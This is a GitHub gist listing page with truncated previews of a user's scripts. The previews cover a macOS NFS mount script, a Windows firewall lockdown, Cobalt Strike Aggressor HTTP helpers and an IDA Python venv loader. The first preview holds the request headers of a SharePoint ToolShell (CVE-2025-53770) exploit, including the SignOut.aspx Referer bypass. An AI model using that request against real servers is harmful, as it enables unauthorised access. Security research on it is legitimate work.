letsroot lsr00ter
lsr00ter
/ CVE‑2025‑53770.req
Last active
July 21, 2025 10:47
— forked from gboddin/payload.txt
SharePoint RCE — ToolShell (CVE‑2025‑53770) Sharepoint "0day" payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1 | |
| Host: x.x.x.x | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 | |
| Content-Length: 7699 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
| Accept-Encoding: gzip, deflate, br | |
| Connection: keep-alive | |
| Content-Type: application/x-www-form-urlencoded | |
| Referer: /_layouts/SignOut.aspx | |
| Connection: close |
lsr00ter
/ RecursiveDirectoryWorker.ps1
Created
July 20, 2025 02:50
Recursive working on every subfolder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Store the root folder location | |
| $rootFolder = Get-Location | |
| # Define the command to execute in each directory | |
| $command = @" | |
| dir | |
| "@ | |
| # Array to store exception details | |
| $exceptions = @() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Accept start directory parameter, default to current directory | |
| param( | |
| [string]$StartDir = "." | |
| ) | |
| # Validate the start directory exists | |
| if (-not (Test-Path $StartDir)) { | |
| Write-Host "Error: Directory '$StartDir' does not exist." -ForegroundColor Red | |
| exit 1 | |
| } |
lsr00ter
/ mount_nfs_on_macos_with_grace.sh
Last active
July 22, 2025 03:20
Mount an NFS share on macOS gracefully to ensure seamless and reliable access.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Default values | |
| FILE="/etc/nfs.conf" | |
| LINE="nfs.client.mount.options = vers=4" | |
| REMOTE_SERVER="" | |
| SERVER_DIR="" | |
| MOUNTED_DIR="" | |
| UNMOUNT=false |
lsr00ter
/ install_weaponizedvsc.sh
Created
May 31, 2025 14:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| set -e | |
| echo "== WeaponizedVSCode Environment Setup ==" | |
| # 1. Check and install dependencies | |
| install_if_missing() { | |
| local cmd="$1" | |
| local pkg="$2" |
lsr00ter
/ windows_firewall_conf.ps1
Created
April 22, 2025 16:59
Using windows firewall to block all connection and exclude special dest IP like 1.1.1.1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enable Windows Firewall for all profiles (Domain, Private, Public) | |
| netsh advfirewall set allprofiles state on | |
| # Block all inbound and outbound traffic for Domain profile (used when connected to a domain network) | |
| netsh advfirewall set domainprofile firewallpolicy blockinbound,blockoutbound | |
| # Block all inbound and outbound traffic for Private profile (used for home or work networks) | |
| netsh advfirewall set privateprofile firewallpolicy blockinbound,blockoutbound | |
| # Block all inbound and outbound traffic for Public profile (used for public networks like cafes) |
lsr00ter
/ httpget.cna
Created
April 14, 2025 15:26
Simple HTTP GET request implementation for JDK >= 11 & Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Simple HTTP GET request implementation for JDK >= 11 & Cobalt Strike 4.0 Aggressor Script. | |
| # Works with HTTP & HTTPS | |
| # | |
| # Author: m4chin3 | |
| # | |
| # | |
| # httpRequest($url); |
lsr00ter
/ httprequest.cna
Created
April 14, 2025 15:13
— forked from mgeeky/httprequest.cna
Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. | |
| # Works with HTTP & HTTPS, GET/POST/etc. + redirections. | |
| # | |
| # Mariusz B. / mgeeky | |
| # | |
| import java.net.URLEncoder; | |
| import java.io.BufferedReader; | |
| import java.io.DataOutputStream; |
lsr00ter
/ httprequest.cna
Created
April 14, 2025 15:13
— forked from alchemaxny/httprequest.cna
Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. Works with HTTP & HTTPS, GET/POST/etc. + redirections.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Safe & sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script. | |
| # Works with HTTP & HTTPS, GET/POST/etc. + redirections. | |
| # | |
| # Mariusz B. / mgeeky | |
| # | |
| import java.net.URLEncoder; | |
| import java.io.BufferedReader; | |
| import java.io.DataOutputStream; |
lsr00ter
/ idapythonrc.py
Created
April 2, 2025 03:31
Use python's venv in idapy on macOS, put it in ~/.idapro/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| from pathlib import Path | |
| import idaapi | |
| # via: https://github.com/eset/ipyida/blob/master/README.virtualenv.adoc | |
| def activate_virtualenv(virtualenv_path: Path): | |
| for bindir in ("Scripts", "bin"): | |
| activate_this_path = virtualenv_path / bindir / "activate_this.py" |
NewerOlder